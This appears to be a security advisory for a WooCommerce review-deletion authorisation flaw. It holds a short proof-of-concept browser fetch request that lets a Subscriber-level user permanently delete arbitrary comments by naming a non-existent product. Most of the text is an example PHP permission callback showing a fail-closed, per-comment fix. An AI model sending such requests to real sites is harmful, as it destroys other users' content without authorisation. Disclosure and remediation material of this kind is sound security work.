The plugin does not perform a proper authorisation check when deleting reviews, which allows any authenticated user, with privileges as low as Subscriber, to delete arbitrary comments.
Log in as any user (with privileges as low as Subscriber) and send the following request from the browser's JavaScript console while on the site:
// DELETE request against the WC v2 product-reviews endpoint, sent with the
// logged-in user's cookies. WordPress only treats a cookie-authenticated REST
// request as logged in when a valid "wp_rest" nonce is sent in X-WP-Nonce;
// wpApiSettings.nonce is assumed to hold it (WordPress exposes it on pages
// where the wp-api script is enqueued), otherwise substitute the nonce.
fetch("https://127.0.0.1:8001/?rest_route=/wc/v2/products/1324/reviews/2&force=1", {
    "headers": {
        "content-type": "application/x-www-form-urlencoded",
        "X-WP-Nonce": wpApiSettings.nonce
    },
    "method": "DELETE",
    "credentials": "include"
});
The product referenced in the URL (ID 1324 above) must not exist. Because force=1 is set, the request permanently removes the comment with ID 2 rather than moving it to the trash.
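The failure described above (a missing product lets the request fall through to the deletion) is a permission callback that does not fail closed and that never ties the decision to the specific comment. The following is an added example of how a review-delete route should be authorised; it is not the affected plugin's code, and the "example/v1" namespace, the function names and the choice to let non-moderators delete only their own review are assumptions made for illustration.

```php
<?php
// Added example, not the affected plugin's code. A REST route that deletes a
// product review only after an object-level authorisation check, and that
// returns 404 (instead of skipping the check) when the product does not exist.
// The "example/v1" namespace and function names are hypothetical.

add_action( 'rest_api_init', function () {
    register_rest_route( 'example/v1', '/products/(?P<product_id>\d+)/reviews/(?P<id>\d+)', array(
        'methods'             => WP_REST_Server::DELETABLE,
        'permission_callback' => 'example_can_delete_review',
        'callback'            => 'example_delete_review',
        'args'                => array(
            'product_id' => array( 'sanitize_callback' => 'absint' ),
            'id'         => array( 'sanitize_callback' => 'absint' ),
            'force'      => array( 'default' => false ),
        ),
    ) );
} );

function example_can_delete_review( WP_REST_Request $request ) {
    $product_id = (int) $request['product_id'];
    $review_id  = (int) $request['id'];

    // Fail closed: an unknown product is an error, never a reason to skip authorisation.
    $product = function_exists( 'wc_get_product' ) ? wc_get_product( $product_id ) : get_post( $product_id );
    if ( ! $product ) {
        return new WP_Error( 'rest_product_invalid_id', 'Invalid product ID.', array( 'status' => 404 ) );
    }

    // The review must exist and must belong to the product named in the URL, so the
    // product segment cannot be used to reach an arbitrary comment ID.
    $review = get_comment( $review_id );
    if ( ! $review || (int) $review->comment_post_ID !== $product_id ) {
        return new WP_Error( 'rest_review_invalid_id', 'Invalid review ID.', array( 'status' => 404 ) );
    }

    // Authorisation is decided per comment: moderators may delete any review,
    // everyone else only a review they authored (assumed policy for this example).
    if ( current_user_can( 'moderate_comments' ) ) {
        return true;
    }
    $user_id = get_current_user_id();
    if ( $user_id && (int) $review->user_id === $user_id ) {
        return true;
    }
    return new WP_Error(
        'rest_forbidden',
        'Sorry, you are not allowed to delete this review.',
        array( 'status' => rest_authorization_required_code() )
    );
}

function example_delete_review( WP_REST_Request $request ) {
    $review_id = (int) $request['id'];
    $force     = (bool) $request['force'];

    // force=1 deletes permanently; otherwise the review is only trashed.
    $deleted = $force ? wp_delete_comment( $review_id, true ) : wp_trash_comment( $review_id );
    if ( ! $deleted ) {
        return new WP_Error( 'rest_cannot_delete', 'The review cannot be deleted.', array( 'status' => 500 ) );
    }
    return rest_ensure_response( array( 'deleted' => true, 'id' => $review_id, 'force' => $force ) );
}
```

The point of the structure is that every early return in the permission callback is a denial: a request with a non-existent product, a review that belongs to a different product, or a caller who neither moderates comments nor owns the review never reaches `wp_delete_comment`.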